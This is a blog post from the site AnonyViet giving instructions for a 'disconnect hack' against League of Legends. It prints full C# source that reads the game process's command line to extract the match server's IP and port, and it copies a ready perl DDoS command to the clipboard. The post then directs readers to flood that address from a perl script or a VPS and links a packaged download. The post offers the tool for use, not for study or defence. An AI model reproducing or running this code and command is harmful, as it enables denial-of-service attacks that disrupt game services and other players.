• Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
AnonyViet - English Version
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
No Result
View All Result
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
No Result
View All Result
AnonyViet - English Version
No Result
View All Result

Instructions for creating a disconect hack tool LoL

AnonyViet by AnonyViet
February 2, 2023
in Security
0

This is a tool to disconnect Lol by detecting the opponent’s IP and then DDOS, the link tool is at the end of the article

Join the channel Telegram of the AnonyViet 👉 Link 👈

Here is the code if you want to create your own file

Visual Studio is required first to package C# application
Code tool Find the IP of the match as follows:

Instructions for creating a tool to hack disconect LoL 4

using System;
using System.Collections.Generic;
using System.Management;
using System.Text.RegularExpressions;
using System.Windows.Forms;

namespace League_IP
{
  internal class Lolip
  {
    [STAThread]
    private static void Main(string[] args)
    {
      List<string> list = new Lolip().wmi_process();
      if (list.Count < 1)
        return;
      Console.WriteLine("LOLIP - Modified by HackerPro536 - HVNGroups.Net");
      Console.WriteLine("\nIP: " + list[0]);
      Console.WriteLine("Port: " + list[1]);
      Clipboard.SetText("perl hvn.pl " + list[0] + " " + list[1] + " 1024 600");
      Console.ReadLine();
    }

    private List<string> wmi_process()
    {
      string input = "";
      List<string> list1 = new List<string>();
      try
      {
        foreach (ManagementBaseObject managementBaseObject in new ManagementObjectSearcher("root\\CIMV2", "SELECT * FROM Win32_Process WHERE Caption = 'League of Legends.exe'").Get())
          input = managementBaseObject["CommandLine"].ToString();
      }
      catch (ManagementException ex)
      {
        Console.WriteLine("An error occurred while querying for WMI data: " + ex.Message);
      }
      if (input.Length <= 1)
        return list1;
      string pattern = "\"";
      IList<int> list2 = (IList<int>) new List<int>();
      foreach (Match match in Regex.Matches(input, pattern))
        list2.Add(match.Index);
      int num = list2[list2.Count - 2];
      string str1 = input.Substring(num + 1);
      string str2 = str1.Substring(0, str1.IndexOf(' ') + 1);
      string str3 = str1.Substring(str2.Length, 4);
      string str4 = str2.Trim();
      string str5 = str3.Trim();
      list1.Add(str4);
      list1.Add(str5);
      return list1;
    }
  }
}

After packaging will be the following application:

Download here: >>>Download<<<

After having the program Find the match IP, then use perl ddos ​​or ddos ​​on VPS, koding whatever you like:
The code is as follows:

perl lol.pl IP Port Time request

The article achieved: 5/5 – (100 votes)

Tags: creatingdisconectHackInstructionsLOLtool
Previous Post

[PyHack] Lesson 2: Check if the MAC that the user has changed is correct

Next Post

Tool to check Hotmail registered or not used to check old acc

AnonyViet

AnonyViet

Related Posts

How to intercept traffic using Burp Suite to analyze HTTP/HTTPS
Security

How to intercept traffic using Burp Suite to analyze HTTP/HTTPS

April 18, 2026
How to use hackers use Splitfus to execute PowerShell malicious code
Security

How to use hackers use Splitfus to execute PowerShell malicious code

July 20, 2025
How to implement Shellcode Injection attack technique with Autoit
Security

How to implement Shellcode Injection attack technique with Autoit

March 14, 2025
How to exploit the holy hole of Hijacking on Windows
Security

How to exploit the holy hole of Hijacking on Windows

March 8, 2025
Hamamal: Shellcode execution technique from afar to overcome Antivirus's discovery
Security

Hamamal: Shellcode execution technique from afar to overcome Antivirus's discovery

February 10, 2025
Snov.io Email Finder: Search emails with only company name/domain name/LinkedIn profile
Security

Snov.io Email Finder: Search emails with only company name/domain name/LinkedIn profile

December 14, 2024
Next Post
Tool to check Hotmail registered or not used to check old acc

Tool to check Hotmail registered or not used to check old acc

0 0 votes
Article Rating
Subscribe
Login
Notify of
guest

guest

0 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments

Recent News

How to intercept traffic using Burp Suite to analyze HTTP/HTTPS

How to intercept traffic using Burp Suite to analyze HTTP/HTTPS

April 18, 2026
How to avoid Adblock detection on Youtube with 4 good tips

How to avoid Adblock detection on Youtube with 4 good tips

April 17, 2026
How to transfer ChatGPT data to Claude is extremely simple

How to transfer ChatGPT data to Claude is extremely simple

April 16, 2026
How to authenticate the owner’s SIM on VNeID from April 15

How to authenticate the owner’s SIM on VNeID from April 15

April 15, 2026
How to intercept traffic using Burp Suite to analyze HTTP/HTTPS

How to intercept traffic using Burp Suite to analyze HTTP/HTTPS

April 18, 2026
How to avoid Adblock detection on Youtube with 4 good tips

How to avoid Adblock detection on Youtube with 4 good tips

April 17, 2026
How to transfer ChatGPT data to Claude is extremely simple

How to transfer ChatGPT data to Claude is extremely simple

April 16, 2026
AnonyViet - English Version

AnonyViet

AnonyViet is a website share knowledge that you have never learned in school!

We are ready to welcome your comments, as well as your articles sent to AnonyViet.

Follow Us

Contact:

Email: anonyviet.com[@]gmail.com

Main Website: https://anonyviet.com

Recent News

How to intercept traffic using Burp Suite to analyze HTTP/HTTPS

How to intercept traffic using Burp Suite to analyze HTTP/HTTPS

April 18, 2026
How to avoid Adblock detection on Youtube with 4 good tips

How to avoid Adblock detection on Youtube with 4 good tips

April 17, 2026
No Result
View All Result
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office

wpDiscuz
0
0
Would love your thoughts, please comment.x
()
x
| Reply